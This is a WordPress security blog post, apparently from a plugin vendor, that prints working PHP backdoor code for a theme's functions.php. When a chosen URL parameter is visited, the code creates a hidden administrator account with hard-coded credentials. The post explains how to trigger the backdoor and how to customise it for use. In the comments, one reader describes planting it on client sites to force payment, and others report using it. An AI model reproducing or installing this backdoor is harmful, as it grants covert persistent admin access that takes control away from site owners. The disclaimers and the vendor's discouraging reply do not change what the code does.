Home Blog WordPress Security WordPress Backdoor to Create Administrator Account

WP Backdoor to Create Administrator Account

WordPress Backdoor to Create Administrator Account

While doing a WordPress security audit and WordPress security lock down for one of our customers, I noticed he had a WordPress password backdoor installed on his WordPress installation. The WordPress backdoor is a very simple, yet powerful PHP script which can be triggered by accessing a specific URL using a normal web browser, such as Google Chrome of Firefox.

Once the WordPress backdoor is triggered, a new WordPress user with Administrator role is automatically created on the customer’s WordPress website, which a malicious user can use to regain access to someone’s WordPress installation any time he or she wants. In this post we will have a look at this WordPress backdoor’s code and explain how it works.

Note: This post is for educational and learning purposes ONLY. In fact we DO NOT recommend anyone to use such a backdoor in his or her WordPress installation.

WordPress Backdoor

The WordPress backdoor is listed in the below example. It is a simple PHP function that can be added to the WordPress theme’s functions.php file.

<?php
add_action('wp_head', 'WordPress_backdoor');

function WordPress_backdoor() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('backdooradmin')) {
$user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

The backdoor can be triggered by accessing the URL https://melapress.com?backdoor=go (if installed on https://melapress.com/ (this is a NON working example)).

How Does the WordPress Password Backdoor Work?

Using the above example, once the WordPress backdoor is triggered a new WordPress administrator account is created with the following credentails:

User:  backdooradmin
Password: Pa55W0rd

Using the WordPress Backdoor

If you would like to use the above WordPress backdoor for whatever reason you might have, use a different URL (by changing the GET variable and value on line 5) from the one specified in the above exampled. Also use a strong username and password (specified on line 8).

WP White Security Tip: We DO NOT recommend you to use such WordPress backdoor. This information in this post should only be used for educational and learning purposes.

Please note that by posting information about this WordPress backdoor online, we are not exposing anything malicious. For someone to create such backdoor, he or she would need FTP access to your WordPress website. If someone manages to gain FTP access to your WordPress website, there are many other things you should worry about rather than this WordPress backdoor.

If you would like to make a WordPress Security Audit, harden the security of your WordPress installation or need any type of WordPress professional support, drop us an email on support@melapress.com.


6 thoughts on “WordPress Backdoor to Create Administrator Account

  1. It worked perfectly, thanks a lot!
    I’ve been ripped off once so I believe leaving a backdoor until the client pays you in full is more than legit.
    I would just suggest specifying that the abovementioned credentials should be changed every time, otherwise anyone could run a simple script and find backdoors like the above.
    Just my 2 cents.
    Regards,
    Pat

    1. Glad it worked for you. However, I do not recommend to use this as a backdoor on your clients website. Such approach is really unethical and very risky! There are several other ways how to protect your benefits / business without using such measures.

  2. Guys, I need to erase an entire post along with its corresponding photos in my blog. But whenever I sign in and look at my dashboard, the post isn’t there. Impossible to delete something that doesn’t exists, right? But when I web search or view the blog site, the post and photos are there. What’s happening here? No, I did not use that reality stone on my blog.

    Here’s my WordPress blog — jonianzures.wordpress.com and I want to completely remove the post “Janet and Niña at SM City – Marilao” and its pictures. Many thanks, amigos!

    You can delete it from there or just me how to dowg it.

  3. Hi, the script works as you explain but I keep getting this error “You do not have sufficient permissions to access this page.” Even after I log out and then use the normal admin access, I can see the new account made along with the user role being admin but I still get the error. I am using 3.4.2 Please help

    1. Hi Tico,

      Thank you for following our blog. We are willing to assist you solve your issue, but due to the sensitivity of the issue (i.e. a WordPress backdoor implementation) contact us directly via our contact form since we need to verify that you are the owner of the website you are working on.


Leave a Reply

Your email address will not be published. Required fields are marked *

Stay in the loop

Subscribe to the Melapress newsletter and receive curated WordPress management and security tips and content.

Newsletter icon

It’s free and you can unsubscribe whenever you want. Check our blog for a taste.

Envelope icon

The survey results are in: Find out what your WordPress security gameplan might be missing

Close

The survey results are in: Find out what your WordPress security gameplan might be missing

Uploading Melapress Login Security as a zip file in WordPress
Melapress Login Security in the WordPress plugin repository
Close

Installing Melapress Login Security Free

Congratulations on taking control of your WordPress website's security by implementing robust login and password policies with Melapress Login Security. You can change your login page URL, limit failed login attempts, and reset passwords.

 

Below are two ways to install Melapress Login Security on your website:

Go to your plugin dashboard on your site, then go to "Add New" and then search for Melapress Login Security.

Download the Melapress Login Security plugin zip, then select upload in your plugin dashboard under "Add New".

OPTION 1

OPTION 2

Uploading CAPTCHA 4WP as a zip file in WordPress
CAPTCHA 4WP in the WordPress plugin repository
Close

Installing CAPTCHA 4WP Free

Well done you. You're one step closer to safeguarding your WordPress website from spam and automated attacks with CAPTCHA 4WP. You'll be able to effortlessly integrate CAPTCHA into your forms and enjoy a website with enhanced security.

 

Below are two ways to install CAPTCHA 4WP on your website:

Go to your plugin dashboard on your site, then go to "Add New", and then search for CAPTCHA 4WP.

Download the CAPTCHA 4WP plugin zip, then select upload in your plugin dashboard under "Add New".

OPTION 1

OPTION 2

Uploading WP Activity Log as a zip file in WordPress
WP Activity Log in the WordPress plugin repository
Close

Installing WP Activity Log Free on your website

You deserve a pat on the back for choosing to record user actions and changes on your website. That is the first step towards better user accountability, easier troubleshooting of website security, and many other benefits of issues.

 

Below are the two ways to install WP Activity Log on your website:

Go to your plugin dashboard on your site, then go to "Add New" and then search for WP Activity Log.

Download the WP Activity Log plugin zip, then select upload in your plugin dashboard under "Add New".

OPTION 1

OPTION 2

Uploading WP 2FA as a zip file in WordPress
WP 2FA in the WordPress plugin repository
Close

Installing WP 2FA Free

Congratulations on taking the first step towards enhancing your WordPress site's security with WP 2FA Free! You're now on your way to protecting your valuable data and ensuring peace of mind. No coding or technical knowledge is required.

 

Below are two ways to install WP 2FA on your website:

Go to your plugin dashboard on your site, then go to "Add New", and then search for WP 2FA.

Download the WP 2FA plugin zip, then select upload in your plugin dashboard under "Add New".

OPTION 1

OPTION 2